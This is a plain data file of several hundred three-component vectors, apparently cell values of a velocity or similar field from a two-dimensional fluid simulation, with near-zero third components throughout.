(-0.00194977997493 1.50002141593e-05 0)
(-0.00194316926168 2.0174851931e-05 0)
(-0.00193391729715 2.69667518261e-05 0)
(-0.0019165392842 3.49715284961e-05 0)
(-0.00189792981546 4.37032578686e-05 0)
(-0.00187154164679 5.19400501209e-05 0)
(-0.00182964316091 5.83364288358e-05 0)
(-0.00176497021031 6.43395598432e-05 0)
(-0.00170494878875 7.31149960718e-05 0)
(-0.00169944244858 9.18567983297e-05 0)
(-0.00161942214961 0.000116324587382 0)
(-0.00153306887088 0.00013510587845 0)
(-0.0014653887629 0.000143921183463 0)
(-0.00137286562141 0.000152724950777 0)
(-0.00126252817755 0.000173758776859 0)
(-0.00114248077801 0.000200969047026 0)
(-0.00100637035054 0.000231960347808 0)
(-0.000780227697045 0.00026276523097 0)
(-0.000638384985788 0.000372327950218 0)
(-0.000358130166299 0.000377633100439 0)
(-0.000135034335549 0.000263449726151 0)
(-5.11645892191e-06 0.000163966718023 0)
(8.04508511997e-05 0.000121413572961 0)
(0.000162699137773 0.000110008338455 0)
(0.000234787212075 9.58437087378e-05 0)
(0.000297117728243 7.4705527955e-05 0)
(0.000334661773948 4.2876960534e-05 0)
(0.000344356531926 7.21167543822e-06 0)
(0.000323913867669 -1.95855765636e-05 0)
(0.000321430864748 -4.30552309177e-05 0)
(0.000292926190409 -5.7479753956e-05 0)
(0.000258842172168 -6.41245647105e-05 0)
(0.000216896787491 -6.14233760798e-05 0)
(0.000174373440924 -7.03782353638e-05 0)
(0.000108754707903 -7.91575786735e-05 0)
(5.06601386962e-05 -0.00013191188401 0)
(-6.03378048277e-05 -0.000347095388939 0)
(-0.000167477490664 -0.000372617569778 0)
(-0.000259399714889 -0.000341779854987 -8.91221067246e-29)
(-0.000431678797697 -0.000339087038631 8.22390613328e-29)
(-0.000589182366983 -0.000328668468445 7.20772777614e-29)
(-0.000690730202039 -0.000262603405467 -6.55811220018e-29)
(-0.000763988101271 -0.000142848378218 6.5660291988e-29)
(-0.000825755160752 -0.00014886600669 -6.34469930865e-29)
(-0.000890972802052 -0.000179307734678 0)
(-0.000964624595818 -0.000180438709384 0)
(-0.00103609274742 -0.000167535054382 0)
(-0.00109876665612 -0.00015166748126 0)
(-0.00115417784403 -0.00013330184039 0)
(-0.00120216932351 -0.000119447461516 0)
(-0.00125080473756 -0.000111493885085 0)
(-0.00129656903673 -9.96288823445e-05 0)
(-0.00122181587274 -7.67445226985e-05 0)
(-0.00120090339898 -6.26244612931e-05 0)
(-0.00124362358419 -7.32217019532e-05 0)
(-0.00132451944161 -0.000106166912631 0)
(-0.00146870548378 -0.000136402588939 0)
(-0.00154446414274 -0.000139789423202 0)
(-0.00157659765316 -0.000127557128146 0)
(-0.00162443019564 -0.000113685827615 0)
(-0.00167261254552 -0.000103627083306 0)
(-0.00171060946423 -9.58411787023e-05 0)
(-0.00174513203381 -8.57726222864e-05 0)
(-0.00177753383382 -7.51313966101e-05 0)
(-0.00180572249927 -6.55672843171e-05 0)
(-0.00182921954268 -5.79036197816e-05 -1.18962044944e-28)
(-0.00185252896431 -5.1231265817e-05 1.15073702311e-28)
(-0.0018612823727 -4.53032845241e-05 0)
(-0.00187870951338 -3.87913360707e-05 0)
(-0.001906527008 -3.44359421646e-05 0)
(-0.00189716745077 -3.99211591084e-05 0)
(-0.00192439202823 -4.22422953448e-05 0)
(-0.00195869791459 -3.67487526949e-05 0)
(-0.00195050432508 -3.6578021536e-05 0)
(-0.00197155434754 -3.74899322155e-05 0)
(-0.00200104191823 -2.66079333176e-05 0)
(-0.00201408046333 -4.05386470704e-06 0)
(-0.00201197664501 1.28680123403e-05 0)
(-0.00200682686762 1.64191435232e-05 0)
(-0.00200133243946 1.84413454709e-05 0)
(-0.00199206853776 2.41690424918e-05 0)
(-0.00197852211518 3.23881033819e-05 0)
(-0.00196086581088 4.3247527799e-05 0)
(-0.00193891102423 5.56700236475e-05 0)
(-0.00191265164088 6.96430376768e-05 0)
(-0.00188149046516 8.60806538117e-05 0)
(-0.00184463459025 0.000103208988398 0)
(-0.0018017200558 0.000116242151387 0)
(-0.00175260866958 0.000125679120421 0)
(-0.00168761596436 0.000150172030087 0)
(-0.00160800611643 0.000183863653017 0)
(-0.00154259449389 0.000209028101641 0)
(-0.0014639521979 0.000230395797646 0)
(-0.00136476578294 0.000257099843888 0)
(-0.00124967471978 0.00029193368029 0)
(-0.00111920948403 0.000337424301347 0)
(-0.000963392526755 0.000400287536243 0)
(-0.000788519554422 0.000490290083476 0)
(-0.000598791586524 0.000623507753297 0)
(-0.000341757501663 0.000581996294224 0)
(-0.000127054033674 0.000390746692813 0)
(2.86402626621e-06 0.000277518690847 0)
(0.000103377745558 0.000223010823551 0)
(0.000184765292795 0.000187412161639 0)
(0.000252383383782 0.000155559250642 0)
(0.000305931275312 0.000114960340311 0)
(0.000338562259261 6.41851201627e-05 0)
(0.000353798473604 1.48549141394e-05 0)
(0.000366654599548 -2.4928799471e-05 0)
(0.000358196119217 -6.56353047656e-05 0)
(0.000317724971605 -9.83281605504e-05 0)
(0.000266795547366 -0.000110499585404 0)
(0.000214574251172 -0.000111546995627 0)
(0.000167024000011 -0.000132296254194 0)
(0.000116048925792 -0.000182236161051 0)
(3.02730226433e-05 -0.000184637672744 0)
(-6.0103446268e-05 -0.000511583146835 0)
(-8.33828334713e-05 -0.000354476714803 0)
(-0.000212296473292 -0.00051173028099 0)
(-0.000372283627069 -0.000502659136694 0)
(-0.000515231910582 -0.000425990777838 0)
(-0.00031601173171 -0.000174795896456 0)
(-0.000400284511262 -0.000174614192268 0)
(-0.000712959171725 -0.000293657465423 0)
(-0.000846208320872 -0.000296443405027 0)
(-0.000939620916258 -0.00026727216373 0)
(-0.0010237113675 -0.000242783407754 0)
(-0.00109412464629 -0.000215187307479 0)
(-0.0011534773621 -0.000186900137629 0)
(-0.00119501687834 -0.00015009489341 0)
(-0.00115831586671 -0.000104633709623 0)
(-0.00111912611585 -7.47989750153e-05 0)
(-0.0011267871668 -7.33792423021e-05 0)
(-0.00119334056575 -0.000109825508057 0)
(-0.00132699998807 -0.000166410362327 0)
(-0.00144365950931 -0.00021257225361 0)
(-0.00148855103022 -0.000215341731033 0)
(-0.00153545184176 -0.000194586057176 0)
(-0.00158572576259 -0.000175503892196 0)
(-0.00163008615823 -0.000160394416996 0)
(-0.00167015132362 -0.000145666564822 0)
(-0.0017066459386 -0.000131558811296 0)
(-0.00174014796659 -0.000118292795568 0)
(-0.00177500366152 -0.000104901052347 0)
(-0.00180073280523 -9.18960955175e-05 0)
(-0.00182960009552 -8.06420729736e-05 0)
(-0.00184212436758 -7.0731781431e-05 0)
(-0.0018664554639 -6.06247914765e-05 0)
(-0.00186422410753 -5.01175850772e-05 0)
(-0.00188571091313 -4.90905571246e-05 0)
(-0.00192234082588 -5.56981367921e-05 0)
(-0.00191829829903 -6.19814917408e-05 0)
(-0.00195111053106 -6.0280049519e-05 0)
(-0.00198310782165 -5.63671500166e-05 0)
(-0.00199583343336 -5.27918011725e-05 0)
(-0.00200505552409 -3.72367938411e-05 0)
(-0.0020119280539 -1.21850751481e-05 0)
(-0.00201324599744 8.55281353057e-06 0)
(-0.00201066556939 1.94366438368e-05 0)
(-0.00200517259111 2.69974297502e-05 0)
(-0.00199564522854 3.64933447778e-05 0)
(-0.00198191143542 4.86875679579e-05 1.03353059251e-28)
(-0.00196406825156 6.33662832121e-05 -1.03992182359e-28)
(-0.00194197163266 8.00512543432e-05 0)
(-0.00191544453511 9.87332196046e-05 0)
(-0.00188401540885 0.000119383191804 0)
(-0.00184685940063 0.000140670060684 0)
(-0.00180270502509 0.000161555043098 0)
(-0.00175012330048 0.000185861299381 0)
(-0.0016872913459 0.000218899510452 0)
(-0.00161687737267 0.000253717012177 0)
(-0.00154124277121 0.000286879761547 0)
(-0.00145400473449 0.000324476805706 0)
(-0.00134917882177 0.000368968577919 2.01585561241e-28)
(-0.00122520475144 0.000423329440483 -2.34934307498e-28)
(-0.00107956919211 0.0004929058988 0)
(-0.000907984943302 0.000582666150068 0)
(-0.000716543505554 0.000695333366623 0)
(-0.000529251154773 0.00079412061276 0)
(-0.000347506239211 0.000774756908451 0)
(-0.000143618915516 0.000605888884539 0)
(2.15654358157e-05 0.000399484197035 0)
(0.000126104294203 0.000306982745397 0)
(0.000213766478262 0.000260645878244 0)
(0.000286592910381 0.000215983082084 0)
(0.000350852038298 0.000163355618417 0)
(0.00039817834327 9.83569189623e-05 0)
(0.000423442268596 2.99533241062e-05 0)
(0.000411288372157 -4.19821482114e-05 0)
(0.000349968874938 -0.000103770499814 0)
(0.000297238142467 -0.000144794067348 0)
(0.000245132019413 -0.000169961489573 0)
(0.000181904161127 -0.000174127522107 0)
(0.000106762576295 -0.000155991628479 0)
(7.73507724981e-05 -0.000208686476161 0)
(2.60276342443e-05 -0.000245206930666 0)
(-9.20384659669e-06 -0.000520391352948 0)
(-4.57043670433e-05 -0.000431085727596 0)
(-0.000189932974665 -0.000663912701608 0)
(-0.000319527504412 -0.000612735294805 0)
(-0.000360277651524 -0.000415867411452 0)
(-0.000294141247737 -0.000235772516906 0)
(-0.000490115794924 -0.000370117272506 0)
(-0.000705572898653 -0.000481942527962 0)
(-0.00079822185856 -0.000423166243398 0)
(-0.000905518270617 -0.000366763549047 0)
(-0.000998338320905 -0.000332401846143 0)
(-0.00107711802816 -0.000288483941569 0)
(-0.00109963414858 -0.000208568633018 0)
(-0.00103755867874 -0.000125951632485 0)
(-0.0010606609479 -9.58697765594e-05 0)
(-0.00112093781772 -0.000108009526084 0)
(-0.00121736882214 -0.000154552709067 0)
(-0.00132824478654 -0.000218700204339 0)
(-0.00140461903636 -0.00026055911478 0)
(-0.00143507045093 -0.000264159344516 0)
(-0.001482531078 -0.000258100470306 0)
(-0.00153749008306 -0.000245454733998 0)
(-0.00158396519887 -0.00022500369456 0)
(-0.00162728775487 -0.000203499862651 0)
(-0.00166634092656 -0.000184052249246 0)
(-0.00170112686011 -0.000167448179237 0)
(-0.00173878752262 -0.000151178202102 0)
(-0.00176488491533 -0.000134557795601 0)
(-0.00180156000043 -0.00011822697677 0)
(-0.00181401226202 -0.000102059678407 0)
(-0.00184754842514 -8.83698775767e-05 -1.1422247256e-28)
(-0.00183198536152 -7.51718225037e-05 1.08743982017e-28)
(-0.00187178378625 -6.92921895698e-05 0)
(-0.00190694281233 -6.82052773691e-05 0)
(-0.00190956404929 -7.53585369097e-05 0)
(-0.0019488454587 -8.58002536621e-05 0)
(-0.00197173160952 -8.76070868167e-05 0)
(-0.00198825612842 -7.71071776681e-05 0)
(-0.00199970439669 -6.19122593395e-05 0)
(-0.00200791764231 -4.19450240683e-05 0)
(-0.00201410437614 -1.72271013856e-05 0)
(-0.00201672809754 5.37589332977e-06 0)
(-0.00201535965732 2.16236068048e-05 0)
(-0.00201008368238 3.46763419516e-05 0)
(-0.00200054990405 4.85824686416e-05 0)
(-0.00198678921172 6.48002047974e-05 0)
(-0.00196885766643 8.34791194323e-05 0)
(-0.00194660198753 0.00010444612179 0)
(-0.00191972334754 0.000127738512106 0)
(-0.0018876950041 0.00015335023643 0)
(-0.0018496453843 0.000180836507216 0)
(-0.00180426215014 0.000210404193732 0)
(-0.00175018116503 0.000244278619312 0)
(-0.00168665488576 0.000283877690781 0)
(-0.00161478332266 0.000326556081036 0)
(-0.00153407500509 0.000372829257962 0)
(-0.00143912642756 0.000426993667865 0)
(-0.00132420537343 0.000491989218292 0)
(-0.00118587501402 0.000570871923473 0)
(-0.00102225741143 0.000666806991836 0)
(-0.000836509050237 0.000777165110761 0)
(-0.000646801732006 0.000885121324586 0)
(-0.000478181864821 0.000947137883902 0)
(-0.000324645155132 0.000952759726969 0)
(-0.000130566599197 0.000810676345356 0)
(3.8519943391e-05 0.000564314562505 0)
(0.000159211960526 0.000425430011542 0)
(0.000257460696944 0.000347503803922 0)
(0.000337369027699 0.000283774208564 0)
(0.000410101877962 0.000218252487781 0)
(0.000473615460889 0.000135604280328 0)
(0.000482575739412 2.11438487951e-05 0)
(0.000413272995822 -8.85632150067e-05 0)
(0.000353604549193 -0.000162381029945 0)
(0.000293689233294 -0.00021200294672 0)
(0.000226764869509 -0.000241468681774 0)
(0.00015239360882 -0.000225535510245 0)
(9.66690744756e-05 -0.000208514930699 0)
(6.22338344377e-05 -0.000267718813699 0)
(1.65082626787e-05 -0.000280351693637 0)
(-9.67771918701e-07 -0.000490743862233 0)
(-5.34978553583e-05 -0.000522642009951 0)
(-0.000189694977779 -0.000760079582452 0)
(-0.000271585153043 -0.00064625143852 0)
(-0.000216540920674 -0.000335213497964 0)
(-0.000297494267675 -0.000340035642319 0)
(-0.000586159740198 -0.000583193926532 0)
(-0.0006749666995 -0.00058830690168 0)
(-0.000763346706409 -0.000527142417263 0)
(-0.000864862929916 -0.000471447326228 0)
(-0.000961516777096 -0.000405231727668 0)
(-0.000928368309887 -0.000287593803035 0)
(-0.00086708215826 -0.000173002619424 0)
(-0.000930875588278 -0.000144265777216 0)
(-0.00101033844976 -0.000162129192698 0)
(-0.0011446130081 -0.000215057813357 0)
(-0.00127058284607 -0.000269485398579 0)
(-0.00135136829526 -0.000295445335474 0)
(-0.00137207976499 -0.000295192019115 0)
(-0.00142655804245 -0.000306127905836 0)
(-0.00148750071441 -0.000310968216746 0)
(-0.00153473013764 -0.000295253448274 0)
(-0.00157909194391 -0.000271159499215 0)
(-0.00162041910529 -0.000246599287609 0)
(-0.00166428574759 -0.000223803225303 0)
(-0.0016992159412 -0.000200773792653 0)
(-0.00171891099195 -0.000182498381376 0)
(-0.00176822296826 -0.000165307131789 0)
(-0.00177379106573 -0.000142224579283 0)
(-0.00182291014384 -0.000120745083051 0)
(-0.00179472770936 -9.99029983255e-05 0)
(-0.00184956788132 -9.57029388519e-05 0)
(-0.0018310046898 -9.23314661929e-05 0)
(-0.00188996138669 -9.69636369462e-05 0)
(-0.00194007971414 -0.000107109199187 0)
(-0.00196371853934 -0.00011391926308 0)
(-0.0019796744698 -0.000106177604805 0)
(-0.0019930104294 -9.03403302183e-05 0)
(-0.00200367977039 -7.0869706424e-05 0)
(-0.00201207134225 -4.80507798037e-05 0)
(-0.00201826292299 -2.23497515705e-05 0)
(-0.0020214150442 2.41918094716e-06 0)
(-0.00202073625435 2.33371487379e-05 0)
(-0.00201580528435 4.17330044963e-05 0)
(-0.0020064816651 6.03834585726e-05 0)
(-0.00199282476727 8.08830373243e-05 0)
(-0.00197488334617 0.00010375332609 0)
(-0.00195243888979 0.000129140750024 0)
(-0.00192506702878 0.000157248969964 0)
(-0.0018921807568 0.000188291187159 0)
(-0.0018529152764 0.000222435329146 0)
(-0.00180606741743 0.000260307114771 0)
(-0.00175044165829 0.000303143112668 0)
(-0.00168529901051 0.000351445502347 0)
(-0.00161014741058 0.000405109986558 0)
(-0.00152249328136 0.00046680563947 0)
(-0.00141686697953 0.00054087155879 0)
(-0.00128809685033 0.000630039571738 0)
(-0.0011342480489 0.000734862978009 0)
(-0.000957861954 0.000850538623853 0)
(-0.00077181124778 0.000963564434412 0)
(-0.000596580568225 0.00104548932491 0)
(-0.000423464923939 0.00105542190238 0)
(-0.000294723251418 0.00114395618671 0)
(-9.87261372383e-05 0.000963587072171 0)
(5.93531114813e-05 0.000698286548623 0)
(0.000190355259298 0.000543484437302 0)
(0.000310706036909 0.000444517648356 0)
(0.000409112063108 0.00036291282822 0)
(0.000508556388216 0.000287676586999 0)
(0.000571654693972 0.000156821529988 0)
(0.000516334641008 -2.12125918483e-05 0)
(0.000439033732539 -0.000150799971433 0)
(0.000375560408798 -0.000236775885083 0)
(0.000292254119461 -0.000292392944362 0)
(0.000215316915647 -0.000316997426402 0)
(0.000136156854814 -0.000274240647049 0)
(8.56853549883e-05 -0.000255476927075 0)
(5.16113570895e-05 -0.000309127819828 0)
(1.46605089236e-05 -0.000309927843777 0)
(-1.90189799708e-05 -0.000534455322185 0)
(-0.000111776981668 -0.000673159319844 0)
(-0.000239872532442 -0.000831261669364 0)
(-0.000281290042614 -0.000779363145056 0)
(-0.000207824588044 -0.000424154089829 0)
(-0.000413605412726 -0.000585395321242 0)
(-0.000591510850487 -0.00070744908134 0)
(-0.000650184325428 -0.00066877405024 0)
(-0.000735216707401 -0.000611812796552 0)
(-0.000799099290959 -0.000552151092774 0)
(-0.000926983405853 -0.000457286381081 2.99625472035e-28)
(-0.000764026003171 -0.000243646355218 -1.92414156798e-28)
(-0.00085916577657 -0.000212677061566 0)
(-0.00091506255593 -0.000222405963515 0)
(-0.00104499746931 -0.000278917926003 0)
(-0.00119160057483 -0.000348624798253 0)
(-0.00128139887658 -0.000361853360315 0)
(-0.00128952843776 -0.0003331497975 0)
(-0.00135537727176 -0.000342645266278 0)
(-0.00143251675104 -0.000365968829717 0)
(-0.00147968062275 -0.00036297055958 0)
(-0.00152847764743 -0.000342809919011 0)
(-0.00157516165797 -0.000317067145865 0)
(-0.00161853839981 -0.00028865079801 0)
(-0.00165134202108 -0.000258634026259 0)
(-0.00167683082181 -0.00023033537429 0)
(-0.00172488248579 -0.000211653590236 0)
(-0.00171993872228 -0.000192197416144 0)
(-0.00178679458488 -0.000167559591351 0)
(-0.00175299153159 -0.000129401041698 0)
(-0.00181945890898 -0.000120005573672 0)
(-0.00180293306016 -0.000119640811518 1.07155668475e-28)
(-0.00186269817266 -0.000124031480503 -1.08765324933e-28)
(-0.00189791826519 -0.000138424563151 0)
(-0.00195187411651 -0.000145831883108 0)
(-0.00197219579552 -0.000137036290692 0)
(-0.00198538054275 -0.000121296090732 0)
(-0.00199764172978 -0.00010203722568 0)
(-0.00200869113631 -7.99138290472e-05 0)
(-0.00201760116519 -5.48887895513e-05 0)
(-0.00202396940546 -2.75693617616e-05 0)
(-0.00202742483458 -3.20306156232e-07 0)
(-0.00202717638548 2.48339979829e-05 0)
(-0.00202261381358 4.82846142815e-05 0)
(-0.00201357589397 7.17985478904e-05 0)
(-0.00200010996896 9.68263301666e-05 0)
(-0.00198217651027 0.000124152367807 0)
(-0.00195944659561 0.000154235451024 0)
(-0.00193140765371 0.000187502948276 0)
(-0.00189745990555 0.000224419420013 0)
(-0.0018567883611 0.000265536338121 0)
(-0.00180827823977 0.000311652555263 0)
(-0.00175070584446 0.000363746853901 0)
(-0.00168277802549 0.000422774328549 0)
(-0.00160250613185 0.00049062525208 0)
(-0.00150600217743 0.000571258761994 0)
(-0.00138793123539 0.000668448735528 0)
(-0.00124485389627 0.000782304146469 0)
(-0.00107912292041 0.000907074588865 0)
(-0.000901126229731 0.00103075917029 0)
(-0.000725798849904 0.00113360212509 0)
(-0.000565648097469 0.00119897531801 0)
(-0.000416315061958 0.00125191081325 0)
(-0.00028459729501 0.00127990302644 0)
(-0.000102778838518 0.00112440986968 0)
(8.71866617631e-05 0.000828287588412 0)
(0.000246053605103 0.000692546844951 0)
(0.00039926832234 0.000587585126321 0)
(0.000529580988929 0.00048370074346 0)
(0.000636151046599 0.000354656326412 0)
(0.000655248094143 0.000139448322724 0)
(0.000573106132902 -8.08333874544e-05 0)
(0.000501835146968 -0.000233595839746 0)
(0.000403562094291 -0.000334197852649 0)
(0.000296150269531 -0.000391694259693 0)
(0.000198234298154 -0.000381464788236 0)
(0.000127005546843 -0.000340101693614 0)
(6.69958455476e-05 -0.000301935032973 0)
(3.53311529672e-05 -0.000338306003417 0)
(1.16410087806e-05 -0.000342007259617 0)
(-3.75267642146e-05 -0.000622674072406 0)
(-0.000153391376841 -0.000812110794527 0)
(-0.000264831987849 -0.000872039260822 0)
(-0.000188429129656 -0.000558040357132 0)
(-0.000219704777435 -0.00052782122433 0)
(-0.00046589998859 -0.000787886131973 0)
(-0.000550524063794 -0.000788021762916 0)
(-0.000629713206955 -0.000748676887101 0)
(-0.000688315670295 -0.000676788139783 0)
(-0.000775532361134 -0.000611365067585 0)
(-0.000667268445804 -0.000378400797813 0)
(-0.00075527719798 -0.000291505395601 0)
(-0.000840270585363 -0.000285434162552 0)
(-0.000914655757197 -0.000320306914865 0)
(-0.00109767489518 -0.000415552342942 0)
(-0.00120403682236 -0.000445920698795 0)
(-0.0012034614408 -0.00039861236461 0)
(-0.00126435067523 -0.000386715517498 0)
(-0.00136125600996 -0.000415517272671 0)
(-0.00142437202114 -0.000425322504127 0)
(-0.00146953753656 -0.000411796270448 0)
(-0.0015149342627 -0.000389380885432 0)
(-0.00156530124572 -0.000364698263562 0)
(-0.00160850552367 -0.000332561531435 0)
(-0.00165517025458 -0.000291824973618 0)
(-0.0016622591486 -0.000262964954497 0)
(-0.0017247015226 -0.00023984367018 0)
(-0.00173086319146 -0.00021144571789 0)
(-0.00172552772326 -0.000182535063625 0)
(-0.00176115162231 -0.000161246611175 0)
(-0.00183910842334 -0.000151891608162 0)
(-0.00183110879294 -0.000142867523918 0)
(-0.00185036043113 -0.000163106696008 0)
(-0.00193190462412 -0.000182657121632 0)
(-0.0019570698908 -0.000177937491297 0)
(-0.0019755393622 -0.000157727145672 0)
(-0.00199051048408 -0.000135946905039 0)
(-0.00200326102669 -0.000113809066903 0)
(-0.00201473857725 -8.95577668533e-05 0)
(-0.00202425139483 -6.24305151536e-05 0)
(-0.00203102489835 -3.30204780042e-05 0)
(-0.00203473518172 -3.00510957649e-06 0)
(-0.00203483548642 2.61601223899e-05 0)
(-0.00203068496447 5.44229682162e-05 0)
(-0.00202200803466 8.28364278654e-05 1.002661848e-28)
(-0.00200877381812 0.000112619513005 -9.99723459588e-29)
(-0.00199081376998 0.000144725769917 0)
(-0.00196768025337 0.000179874268744 0)
(-0.0019388116299 0.000218693759393 0)
(-0.00190363799711 0.000261862503899 0)
(-0.00186139603941 0.000310226652266 0)
(-0.00181098992963 0.00036488030912 0)
(-0.00175098512441 0.000427226053305 0)
(-0.00167931881583 0.000499308644759 0)
(-0.00159269888961 0.000584510135637 0)
(-0.00148644333723 0.000687003622749 0)
(-0.00135617992108 0.000808354619403 0)
(-0.00120150559368 0.000944002096756 0)
(-0.00102959010733 0.00108181263571 0)
(-0.00085304728713 0.00120599679002 0)
(-0.000684572090675 0.00129724420508 0)
(-0.000534260161414 0.00135162802591 0)
(-0.000401316860503 0.00138475301026 0)
(-0.000282972302453 0.00139234104111 0)
(-0.00014840850253 0.00139417636284 0)
(9.67768288259e-05 0.00102156121149 0)
(0.000307561481911 0.0008593328526 0)
(0.000497274246212 0.000744500950097 0)
(0.000646879344492 0.000598345521137 0)
(0.000751443693785 0.00039788798968 0)
(0.000755446763253 0.000111733785565 0)
(0.000684750568945 -0.000155053521856 0)
(0.000586250896277 -0.000348736030575 0)
(0.000438027731321 -0.000468120331232 0)
(0.000293899166925 -0.000509177552356 0)
(0.000175199862724 -0.000463865352138 0)
(9.8613630719e-05 -0.00041236019893 0)
(3.69813477411e-05 -0.000356762833565 0)
(6.73679810901e-06 -0.000357960815875 0)
(8.11656191842e-07 -0.000362818941896 0)
(-5.1334265756e-05 -0.00073174486713 0)
(-0.000171191686696 -0.000923296396641 0)
(-0.000228856443274 -0.000907648481099 0)
(-0.000182618889717 -0.000612406333281 0)
(-0.000292960073943 -0.000689091546922 0)
(-0.000473107127725 -0.00089037349065 0)
(-0.00051464225452 -0.000863678885505 0)
(-0.000611238437946 -0.000824464285218 0)
(-0.000609397871221 -0.000695329518511 0)
(-0.000779176624766 -0.000687550480417 0)
(-0.000648204670058 -0.000419644038446 0)
(-0.000759307095821 -0.000373810658739 0)
(-0.000830947689956 -0.000373558430071 0)
(-0.000965664658536 -0.00045263798659 0)
(-0.00110983859582 -0.000535750795096 0)
(-0.00118647188548 -0.000512286808544 0)
(-0.00118544861951 -0.000447717001891 0)
(-0.00126747979614 -0.000460836131199 0)
(-0.00135040072805 -0.000486499710036 0)
(-0.00140925081039 -0.000482551199297 0)
(-0.00146216312889 -0.000461622575098 0)
(-0.00150419929416 -0.000433709050662 0)
(-0.00155164204861 -0.000406919648861 0)
(-0.00157830965497 -0.000373291145599 0)
(-0.00160650128331 -0.000321661666571 0)
(-0.00167580924561 -0.000292868635967 0)
(-0.00164283357188 -0.000265600981471 0)
(-0.00175448693558 -0.000239770320096 0)
(-0.00171664817282 -0.000210405641038 0)
(-0.00181092239109 -0.000202893119979 0)
(-0.00177684787187 -0.0001796202251 0)
(-0.00186984903607 -0.000181216828498 0)
(-0.00190711012979 -0.000204289058631 1.13646082912e-28)
(-0.00193744915999 -0.000217860874931 -1.13591904106e-28)
(-0.00196030803021 -0.000202169341873 0)
(-0.00197946202398 -0.000177107366162 0)
(-0.00199609580349 -0.000151626366334 0)
(-0.00200989725901 -0.00012649185539 0)
(-0.00202183520374 -9.9921735884e-05 0)
(-0.00203183015521 -7.06445248551e-05 0)
(-0.00203917517041 -3.88633570812e-05 0)
(-0.00204334980039 -5.83885498952e-06 0)
(-0.00204385195371 2.72534505575e-05 0)
(-0.00204015640718 6.01596303454e-05 0)
(-0.00203194251604 9.3503434525e-05 0)
(-0.00201898485986 0.000128290194581 0)
(-0.00200094032702 0.000165549243086 0)
(-0.00197728929887 0.000206182835404 0)
(-0.00194747160146 0.000250968061096 0)
(-0.00191094955932 0.000300748987918 0)
(-0.00186701664846 0.000356685241941 0)
(-0.00181457932214 0.000420419923218 0)
(-0.00175193254578 0.000494291589545 0)
(-0.00167623328949 0.00058166548167 0)
(-0.00158318837988 0.000686768980819 0)
(-0.00146787922588 0.000812615111909 0)
(-0.0013274462247 0.000957086453568 0)
(-0.00116377172147 0.00111190951275 0)
(-0.000985917254098 0.00126077028275 0)
(-0.000806039666215 0.00138468857178 0)
(-0.00064006831617 0.00145838768473 0)
(-0.000501681587673 0.00148509028153 0)
(-0.000381892193172 0.0015046033089 0)
(-0.000259710893556 0.00151764014294 0)
(-0.000147871149946 0.00151009604936 0)
(6.10945198471e-05 0.00136353668041 0)
(0.000345326403757 0.00101507247721 0)
(0.000607056778732 0.000936272750271 0)
(0.000787761004657 0.000744620936139 0)
(0.000896029277305 0.000456399392914 0)
(0.000919100317417 9.71192407407e-05 0)
(0.00086225188709 -0.000258558546111 0)
(0.000697573932744 -0.00052312873924 0)
(0.000472164261481 -0.000655780804137 0)
(0.000269161651914 -0.00065506675954 0)
(0.000123883002809 -0.000574474430559 0)
(3.28675930942e-05 -0.000483971165104 0)
(-1.71654946729e-05 -0.000407946640545 0)
(-3.15268058624e-05 -0.000367225725236 0)
(-1.4583540966e-05 -0.000350307009088 0)
(-6.14940533639e-05 -0.000862696465804 0)
(-0.000187765788121 -0.00100890667582 0)
(-0.000213719247465 -0.000916367912996 0)
(-0.000187400449418 -0.000667354230159 0)
(-0.000365393905083 -0.000904618136155 0)
(-0.000434248941956 -0.0009299891541 0)
(-0.000484685628541 -0.000931445761875 0)
(-0.000567148753094 -0.00089073690466 0)
(-0.000535923641785 -0.000697313743667 0)
(-0.000679219326402 -0.000681784258671 0)
(-0.000625953922768 -0.000467344292638 0)
(-0.000748578167406 -0.00045895199824 0)
(-0.00081900238452 -0.000474333479077 0)
(-0.000988017298387 -0.000581145069869 0)
(-0.00109512091828 -0.000623615721237 0)
(-0.00108962628241 -0.00053919756202 0)
(-0.00115943272778 -0.000507921075997 0)
(-0.00125830552923 -0.000538176188704 0)
(-0.001330244853 -0.000553998820264 0)
(-0.00138632290718 -0.000541669902526 0)
(-0.00144881042539 -0.000516689562722 0)
(-0.00149779549056 -0.000480652956983 0)
(-0.00155397717697 -0.000442639865603 0)
(-0.00157518457175 -0.000405197316838 0)
(-0.00155829936011 -0.000361369937215 0)
(-0.0016896101541 -0.000327767724677 0)
(-0.00165231555346 -0.00029064218759 0)
(-0.00167294491457 -0.000263079863764 0)
(-0.00171504586153 -0.000244531194219 0)
(-0.00174243703391 -0.000239695223427 0)
(-0.00182792354841 -0.000229460737958 0)
(-0.00184542212621 -0.000229034693618 0)
(-0.00192166821084 -0.000242973653711 0)
(-0.001944730131 -0.00024350481619 0)
(-0.00196409106118 -0.000223844712148 0)
(-0.00198442880602 -0.00019653330293 0)
(-0.00200251277632 -0.0001683001367 0)
(-0.00201755104844 -0.000140178562223 0)
(-0.00203012803846 -0.000111030160469 0)
(-0.00204049233724 -7.9504613479e-05 0)
(-0.00204835620363 -4.52475325343e-05 0)
(-0.00205317131888 -9.0694594797e-06 0)
(-0.00205428499875 2.79651681809e-05 0)
(-0.00205116674106 6.54457003205e-05 0)
(-0.00204349722854 0.000103770136692 0)
(-0.00203091482908 0.00014383171126 0)
(-0.00201282017669 0.000186676161983 0)
(-0.00198858228957 0.000233265009049 0)
(-0.00195772198581 0.000284437216468 0)
(-0.00191980052373 0.000341173247391 0)
(-0.00187419624009 0.000405002331742 0)
(-0.00181989334108 0.000478356032804 0)
(-0.0017550093428 0.000564850469436 0)
(-0.0016760422455 0.000669164577252 0)
(-0.00157790926329 0.000795594626225 0)
(-0.0014556054347 0.00094479481469 0)
(-0.00130780103389 0.00111130028584 0)
(-0.00113561083125 0.00129061595587 0)
(-0.000944776905111 0.00145689767589 0)
(-0.000751996449275 0.00157323357643 0)
(-0.000589490769315 0.00160660414436 0)
(-0.000474285207042 0.0015979805506 0)
(-0.000365507121147 0.00163063667973 0)
(-0.000222367044131 0.0016611574417 0)
(-6.80616817089e-05 0.00164399851453 0)
(9.88933924857e-05 0.00161999687711 0)
(0.000411876985362 0.00155205292641 0)
(0.000630107377454 0.00103298457922 0)
(0.000902104515976 0.000877600271949 0)
(0.00107102282582 0.000570229639817 0)
(0.00118160090884 0.00011905624646 0)
(0.00112498360002 -0.000420990377617 0)
(0.00084289248359 -0.000796977362671 0)
(0.000493780550104 -0.000927102100782 0)
(0.000204779281533 -0.00085859926392 0)
(1.63721675287e-05 -0.000709580829176 0)
(-7.75036138567e-05 -0.000546076832337 0)
(-9.51850620565e-05 -0.000419509521988 0)
